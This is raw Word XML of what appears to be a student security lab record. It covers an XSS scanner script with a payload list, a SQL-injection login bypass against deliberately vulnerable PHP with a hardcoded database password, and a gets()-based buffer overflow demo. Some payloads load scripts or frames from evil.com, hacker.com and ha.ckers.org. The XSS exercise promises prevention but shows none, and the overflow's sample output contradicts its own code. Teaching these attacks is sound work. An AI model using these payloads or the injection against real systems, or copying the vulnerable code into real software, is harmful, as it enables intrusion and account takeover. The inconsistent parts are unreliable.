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33" w:rsidRPr="000122D3" w:rsidRDefault="00BC292F" w:rsidP="00BC29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8"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ex.No. 7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C86433" w:rsidRDefault="00C86433" w:rsidP="00C864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8"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Implement Cross Site Scripting and prevent XSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F7780" w:rsidRDefault="000F7780" w:rsidP="000F77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0F7780" w:rsidRDefault="000F7780" w:rsidP="000F778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Cross site scripting and provide measures to prevent cross site scripting.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F7780" w:rsidRDefault="005E210F" w:rsidP="000F778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>import requests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>fname = "payloads.txt"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>with open(fname) as f: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 xml:space="preserve">    content = f.readlines()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 xml:space="preserve">payloads = [x.strip() for x in content] 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>url = raw_input("URL: ")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>vuln = []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>for payload in payloads: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 xml:space="preserve">    payload = payload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 xml:space="preserve">    xss_url = url+payload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 xml:space="preserve">    r = requests.get(xss_url)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 xml:space="preserve">    if payload.lower() in r.text.lower():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 xml:space="preserve">        print("Vulnerable: " + payload)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 xml:space="preserve">        if(payload not in vuln):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 xml:space="preserve">            vuln.append(payload)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 xml:space="preserve">        print ("Not vulnerable!")</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="005E210F" w:rsidRP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>print ("--------------------\nAvailable Payloads:")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E210F" w:rsidRDefault="005E210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10F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>print ('\n'.join(vuln))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B2701" w:rsidRDefault="007B2701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6FC4" w:rsidRPr="007B2701" w:rsidRDefault="007B2701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701">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//payload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&lt;body onload=alert("XSS")&gt;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&lt;img src="javascript:alert("XSS");"&gt;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&lt;iframe src="http://evil.com/xss.html"&gt;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&lt;input type="image" src="javascript:alert('XSS');"&gt;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&lt;link rel="stylesheet" href="javascript:alert('XSS');"&gt;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lastRenderedPageBreak/>
        <w:t>&lt;table background="javascript:alert('XSS')"&gt;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&lt;div style="background-image: url(javascript:alert('XSS'))"&gt;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&lt;object type="text/x-scriptlet" data="http://hacker.com/xss.html"&gt;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&gt;'&gt;"&gt;&lt;img src=x onerror=alert(0)&gt;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&lt;svg/onload=alert(/RUTHLESS/)&gt;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&lt;img src='aaa'onerror=alert(/@_t0x1c/)&gt;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&lt;!'/*!'/*!//'/*//'/*--!&gt;&lt;Input/Autofocus/%0D*/Onfocus=confirm'1'//&gt;&lt;Svg&gt;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&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;alert('OPENBUGBOUNTY')&lt;/scRipt&gt;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&lt;sCriPt&gt;alert(1);&lt;/sCriPt&gt;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&lt;script&gt;alert(1)&lt;/script&gt;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&lt;script src=http://ha.ckers.org/xss.js&gt;&lt;/script&gt;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'&gt;&lt;script&gt;alert(1)&lt;/script&gt;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\"&gt;&lt;img src=\"blah.jpg\" onerror=\"alert('XSS')\"/&gt;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\"&gt;&lt;script&gt;alert(1)&lt;/script&gt;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\"\/&gt;&lt;img src=\"blahjpg\" onerror=\"alert('XSS')\"/&gt;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\"\/&gt;&lt;img src=\"blah.jpg\" onerror=\"alert('XSS')\"/&gt;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\"/&gt;&lt;script&gt;alert(1)&lt;/script&gt;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&lt;IMG \"\"\"&gt;&lt;script&gt;alert(\"XSS\")&lt;/script&gt;\"&gt;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&lt;script&gt;alert(String.fromCharCode(88,83,83));&lt;/script&gt;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"onmouseover=prompt(/XSSPOSED/)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&lt;/title&gt;&lt;body onload=alert("XSS")&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003266E6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&lt;/title&gt;&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00596FC4" w:rsidRPr="003266E6" w:rsidRDefault="003266E6" w:rsidP="003266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6E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"&gt;&lt;/title&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;alert('OPENBUGBOUNTY')&lt;/scRipt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003266E6" w:rsidRDefault="003266E6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66E6" w:rsidRDefault="003266E6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66E6" w:rsidRDefault="003266E6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66E6" w:rsidRDefault="003266E6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66E6" w:rsidRDefault="003266E6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66E6" w:rsidRDefault="003266E6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66E6" w:rsidRDefault="003266E6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210F" w:rsidRDefault="0052191F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52191F" w:rsidRPr="0052191F" w:rsidRDefault="006E2707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-19878</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>55</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="4457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9B9" w:rsidRDefault="00C639B9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:rsidR="00C639B9" w:rsidRPr="00C639B9" w:rsidRDefault="00C639B9" w:rsidP="005E2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Thus Cross site scripting has been implemented successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E2707" w:rsidRDefault="006E2707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E2707" w:rsidRDefault="006E2707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E2707" w:rsidRDefault="006E2707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E2707" w:rsidRDefault="006E2707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E2707" w:rsidRDefault="006E2707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E2707" w:rsidRDefault="006E2707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E2707" w:rsidRDefault="006E2707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E2707" w:rsidRDefault="006E2707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3266E6" w:rsidRDefault="003266E6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F1CAE" w:rsidRPr="000122D3" w:rsidRDefault="00FF1CAE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8"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ex.No. 8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF1CAE" w:rsidRDefault="00FF1CAE" w:rsidP="00FF1C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Implement SQL Injection Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0085349E" w:rsidRDefault="0085349E" w:rsidP="008534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:rsidR="0085349E" w:rsidRDefault="0085349E" w:rsidP="008534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implement SQL Injection Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0085349E" w:rsidRDefault="0085349E" w:rsidP="008534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</w:p>
    <w:p w:rsidR="000122D3" w:rsidRDefault="00384A2C" w:rsidP="00FF1CA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4A2C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Create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website and the required backend.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00384A2C" w:rsidRDefault="00384A2C" w:rsidP="00FF1CA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login page, enter username as any name and password as xxx ‘ or ‘’1=1’</w:t>
      </w:r>
      <w:r w:rsidR="00CE19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1945" w:rsidRDefault="00CE1945" w:rsidP="00FF1CA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logged in as 1=1 is always true.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE1945" w:rsidRDefault="00CE1945" w:rsidP="00CE194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:rsidR="00CE1945" w:rsidRDefault="00C52807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//login.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E6065" w:rsidRP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065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1E6065" w:rsidRP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065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1E6065" w:rsidRP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065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1E6065" w:rsidRP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065">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;title&gt;</w:t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  <w:t>SQL INJECTION ATTACK</w:t>
      </w:r>
      <w:r w:rsidR="00B0121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  <w:t>&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E6065" w:rsidRP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065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1E6065" w:rsidRP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065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1E6065" w:rsidRP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065">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;form id = 'login' action = 'login.php' method = 'post'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E6065" w:rsidRP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065">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/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  <w:t>&lt;fieldset&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E6065" w:rsidRP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065">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/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  <w:t>&lt;input type="hidden" name="submitted" id = "submitted" value = '1'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E6065" w:rsidRP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065">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/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  <w:t>Username: &lt;input type="text" name="un" id = "un"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E6065" w:rsidRP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065">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/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  <w:t>&lt;br&gt; &lt;br&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E6065" w:rsidRP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065">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/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  <w:t>Password: &lt;input type="Password" name="pwd" id ="pwd"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E6065" w:rsidRP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065">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/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  <w:t>&lt;br&gt; &lt;br&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E6065" w:rsidRP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065">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/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</w:r>
      <w:r w:rsidRPr="001E6065">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;input type="submit" name="submit" value = "Submit"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E6065" w:rsidRP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&lt;/fieldset&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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065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1E6065" w:rsidRDefault="001E6065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//php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>&lt;?php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ab/>
        <w:t>$db = mysqli_connect('localhost', 'system', 'gomathy');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ab/>
        <w:t>if (!$db){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ab/>
      </w:r>
      <w:r w:rsidRPr="00B01218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>exit("Error: Could not connect to MySQL");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$un=$_POST['un'];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ab/>
        <w:t>$pwd = $_POST['pwd'];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ab/>
        <w:t>$query = "SELECT uname, pwd FROM sample WHERE uname = '$un' AND pwd = '$pwd'";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ab/>
        <w:t>$result =NULL;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ab/>
        <w:t>$result = mysqli_query($db, $query);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ab/>
        <w:t>$num_rows = mysqli_num_rows($result);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ab/>
        <w:t>if($num_rows){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ab/>
      </w:r>
      <w:r w:rsidRPr="00B01218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>header("Location : welcome.html")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 w:rsidRPr="00B01218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B0121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ab/>
        <w:t>else{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ab/>
      </w:r>
      <w:r w:rsidRPr="00B01218">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>header("location : welcome.html")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B01218" w:rsidRP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E6065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18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B01218" w:rsidRDefault="00B01218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//welcome.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00942562" w:rsidRPr="00942562" w:rsidRDefault="00942562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2562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942562" w:rsidRPr="00942562" w:rsidRDefault="00942562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2562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942562" w:rsidRPr="00942562" w:rsidRDefault="00942562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2562">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;title&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00942562">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Welcome</w:t>
      </w:r>
      <w:r w:rsidR="0094531C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 w:rsidRPr="00942562">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00942562" w:rsidRPr="00942562" w:rsidRDefault="00942562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2562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42562" w:rsidRPr="00942562" w:rsidRDefault="00942562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2562">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;body&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00942562">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;h1&gt;SUCCESSFULLY LOGGED IN&lt;/h1&gt;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42562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1E6065" w:rsidRDefault="00942562" w:rsidP="009425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2562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953AB" w:rsidRDefault="009953AB" w:rsidP="00CE194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53AB" w:rsidRDefault="009953AB" w:rsidP="00CE194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53AB" w:rsidRDefault="009953AB" w:rsidP="00CE194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53AB" w:rsidRDefault="009953AB" w:rsidP="00CE194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53AB" w:rsidRDefault="009953AB" w:rsidP="00CE194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53AB" w:rsidRDefault="009953AB" w:rsidP="00CE194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53AB" w:rsidRDefault="009953AB" w:rsidP="00CE194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53AB" w:rsidRDefault="009953AB" w:rsidP="00CE194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53AB" w:rsidRDefault="009953AB" w:rsidP="00CE194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7780" w:rsidRDefault="0094531C" w:rsidP="00CE194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94531C" w:rsidRPr="0094531C" w:rsidRDefault="005D509C" w:rsidP="00CE194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943600" cy="19894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2D3" w:rsidRPr="000122D3" w:rsidRDefault="00901DFA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2292350</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="152463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2D3" w:rsidRPr="000122D3" w:rsidRDefault="000122D3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901DFA" w:rsidRDefault="00901DFA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1DFA"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:rsidR="000122D3" w:rsidRPr="00901DFA" w:rsidRDefault="00901DFA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1D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01DFA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Thus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SQL Injection Attack has been implemented successfully.</w:t>
      </w:r>
      <w:r w:rsidRPr="00901D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22D3" w:rsidRPr="000122D3" w:rsidRDefault="000122D3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Default="000122D3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953AB" w:rsidRPr="000122D3" w:rsidRDefault="009953AB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F1CAE" w:rsidRPr="000122D3" w:rsidRDefault="00640C02" w:rsidP="00FF1C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8"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ex.No. 9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00640C02" w:rsidRPr="000122D3" w:rsidRDefault="00640C02" w:rsidP="00640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Implement Buffer Overflow Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C76113" w:rsidRPr="000122D3" w:rsidRDefault="00C76113" w:rsidP="007962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0122D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Aim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C76113" w:rsidRPr="000122D3" w:rsidRDefault="00C76113" w:rsidP="007962B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0122D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To implement Buffer Overflow Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007962BE" w:rsidRPr="00AB47E4" w:rsidRDefault="00FC2E31" w:rsidP="007962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Buffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007962BE" w:rsidRPr="00AB47E4" w:rsidRDefault="007962BE" w:rsidP="007962B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AB47E4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buffer</w:t>
      </w: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is a temporary area for data storage. When more data (than was originally allocated to be stored) gets placed by a program or system process, the extra data overflows. It causes some of that data to leak out into other buffers, which can corrupt or overwrite whatever data they were holding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007962BE" w:rsidRPr="00AB47E4" w:rsidRDefault="00FC2E31" w:rsidP="007962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Buffer Overflow Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007962BE" w:rsidRPr="00AB47E4" w:rsidRDefault="007962BE" w:rsidP="007962B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 a </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB47E4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buffer-overflow attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB47E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,</w:t>
      </w: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the extra data sometimes holds specific instructions for actions intended by a hacker or malicious user; for example, the data could trigger a response that damages files, changes data or unveils private information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007962BE" w:rsidRPr="00AB47E4" w:rsidRDefault="007962BE" w:rsidP="007962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Program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007962BE" w:rsidRPr="000122D3" w:rsidRDefault="007962BE" w:rsidP="00C76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7962BE" w:rsidRPr="000122D3" w:rsidRDefault="007962BE" w:rsidP="00C76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#i</w:t>
      </w:r>
      <w:r w:rsidRPr="000122D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nclude &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007962BE" w:rsidRPr="000122D3" w:rsidRDefault="007962BE" w:rsidP="00C76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>int main(void){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007962BE" w:rsidRPr="000122D3" w:rsidRDefault="007962BE" w:rsidP="00FC2E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>char buff[15];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007962BE" w:rsidRPr="000122D3" w:rsidRDefault="007962BE" w:rsidP="00FC2E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>int pass = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007962BE" w:rsidRPr="000122D3" w:rsidRDefault="007962BE" w:rsidP="00FC2E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printf</w:t>
      </w:r>
      <w:r w:rsidRPr="000122D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>("\n Enter the password : \n");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007962BE" w:rsidRPr="000122D3" w:rsidRDefault="007962BE" w:rsidP="00FC2E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>gets(buff);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007962BE" w:rsidRPr="000122D3" w:rsidRDefault="007962BE" w:rsidP="00FC2E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122D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>f(strcmp(buff, "thegeekstuff")){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007962BE" w:rsidRPr="000122D3" w:rsidRDefault="007962BE" w:rsidP="00C76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r w:rsidRPr="000122D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00FC2E31" w:rsidRPr="000122D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AB47E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122D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rintf ("\n Wrong Password \n");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007962BE" w:rsidRPr="000122D3" w:rsidRDefault="007962BE" w:rsidP="00FC2E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962BE" w:rsidRPr="000122D3" w:rsidRDefault="007962BE" w:rsidP="00FC2E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>else</w:t>
      </w:r>
      <w:r w:rsidRPr="000122D3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C2E31" w:rsidRPr="000122D3" w:rsidRDefault="007962BE" w:rsidP="00FC2E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r w:rsidRPr="000122D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AB47E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pri</w:t>
      </w:r>
      <w:r w:rsidRPr="000122D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ntf ("\n Correct Password \n");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007962BE" w:rsidRPr="000122D3" w:rsidRDefault="007962BE" w:rsidP="00C76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r w:rsidRPr="000122D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00FC2E31" w:rsidRPr="000122D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000122D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pass = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007962BE" w:rsidRPr="000122D3" w:rsidRDefault="007962BE" w:rsidP="00FC2E3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AB47E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000122D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>if(pass){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007962BE" w:rsidRPr="000122D3" w:rsidRDefault="007962BE" w:rsidP="00FC2E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r w:rsidRPr="000122D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00FC2E31" w:rsidRPr="000122D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00AB47E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>printf ("\n Root pri</w:t>
      </w:r>
      <w:r w:rsidRPr="000122D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vileges given to the user \n");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007962BE" w:rsidRPr="000122D3" w:rsidRDefault="007962BE" w:rsidP="00FC2E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962BE" w:rsidRPr="000122D3" w:rsidRDefault="007962BE" w:rsidP="00FC2E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:rsidR="007962BE" w:rsidRPr="00AB47E4" w:rsidRDefault="007962BE" w:rsidP="00C76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7962BE" w:rsidRPr="00AB47E4" w:rsidRDefault="007962BE" w:rsidP="00C76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7962BE" w:rsidRPr="000122D3" w:rsidRDefault="007962BE" w:rsidP="00C76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>Enter the password : gomathy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007962BE" w:rsidRPr="000122D3" w:rsidRDefault="007962BE" w:rsidP="00C76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Correct Password </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007962BE" w:rsidRPr="000122D3" w:rsidRDefault="007962BE" w:rsidP="00C76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Root privileges given to the user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007962BE" w:rsidRPr="000122D3" w:rsidRDefault="007962BE" w:rsidP="00C76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Enter the password :</w:t>
      </w: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 gomathy nagarajan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007962BE" w:rsidRPr="000122D3" w:rsidRDefault="007962BE" w:rsidP="00C76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Wrong Password </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007962BE" w:rsidRPr="00AB47E4" w:rsidRDefault="007962BE" w:rsidP="00C76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Root privileges given to the user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007962BE" w:rsidRPr="000D35F1" w:rsidRDefault="00C23E54" w:rsidP="007962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35F1"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:rsidR="00C23E54" w:rsidRPr="000D35F1" w:rsidRDefault="00C23E54" w:rsidP="007962B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5F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Thus Buffer Overflow attack has been implemented successfully.</w:t>
